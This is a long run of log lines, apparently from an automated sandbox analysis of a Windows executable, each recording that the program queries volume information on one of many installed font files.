          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
